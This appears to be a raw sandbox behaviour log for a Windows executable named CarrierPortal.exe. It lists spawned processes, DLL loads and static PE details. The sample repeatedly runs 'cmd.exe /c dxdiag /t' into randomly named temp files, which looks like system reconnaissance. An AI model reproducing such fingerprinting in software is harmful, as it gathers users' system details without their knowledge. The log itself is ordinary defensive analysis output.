Source: C:\Users\user\Desktop\CarrierPortal.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\CarrierPortal.exe "C:\Users\user\Desktop\CarrierPortal.exe"
Source: C:\Users\user\Desktop\CarrierPortal.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
Source: unknownProcess created: C:\Windows\System32\Taskmgr.exe "C:\Windows\system32\taskmgr.exe" /4
Source: unknownProcess created: C:\Windows\System32\Taskmgr.exe "C:\Windows\system32\taskmgr.exe" /4
Source: C:\Users\user\Desktop\CarrierPortal.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txtJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txtJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\CarrierPortal.exe "C:\Users\user\Desktop\CarrierPortal.exe"Jump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txtJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxdiagn.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d12.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: wmiclnt.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dsound.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: devrtl.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: spinf.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: drvstore.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: spfileq.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: wifidisplay.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: mf.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: mfcore.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: ksuser.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: mfsensorgroup.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: comppkgsup.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.media.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dispbroker.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d12core.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxilconv.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3dscache.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: mscat32.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: ddraw.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dciman32.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: avrt.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: midimap.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: hid.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: devenum.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: quartz.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxdiagn.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d12.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: devobj.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmmbase.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: wmiclnt.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: userenv.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: profapi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: winbrand.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dsound.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: devrtl.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: spinf.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: drvstore.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: spfileq.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: wifidisplay.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: wlanapi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: mmdevapi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: mfplat.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: rtworkq.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: mf.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: mfcore.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: ksuser.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: mfsensorgroup.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: comppkgsup.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.media.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.applicationmodel.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dispbroker.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d12core.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxcore.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dxilconv.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3dscache.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: mscat32.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: ddraw.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dciman32.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: avrt.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: audioses.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: msacm32.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: midimap.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: dinput8.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: inputhost.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: propsys.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: hid.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: devenum.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: msdmo.dll
Source: C:\Windows\System32\dxdiag.exeSection loaded: quartz.dll
Source: C:\Windows\System32\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32Jump to behavior
Source: C:\Windows\System32\Taskmgr.exeWindow found: window name: SysTabControl32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: CarrierPortal.exeStatic PE information: certificate valid
Source: CarrierPortal.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: CarrierPortal.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: CarrierPortal.exeStatic file information: File size 21461272 > 1048576
Source: CarrierPortal.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x85c000
Source: CarrierPortal.exeStatic PE information: Raw size of .svm_hea is bigger than: 0x100000 < 0xbe0000
Source: CarrierPortal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CarrierPortal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CarrierPortal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CarrierPortal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CarrierPortal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CarrierPortal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: CarrierPortal.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: CarrierPortal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: BasicDisplay.pdb source: dxdiag.exe, 00000004.00000003.1198351485.000001D76470D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1729056136.00000143D2092000.00000004.00000020.00020000.00000000.sdmp
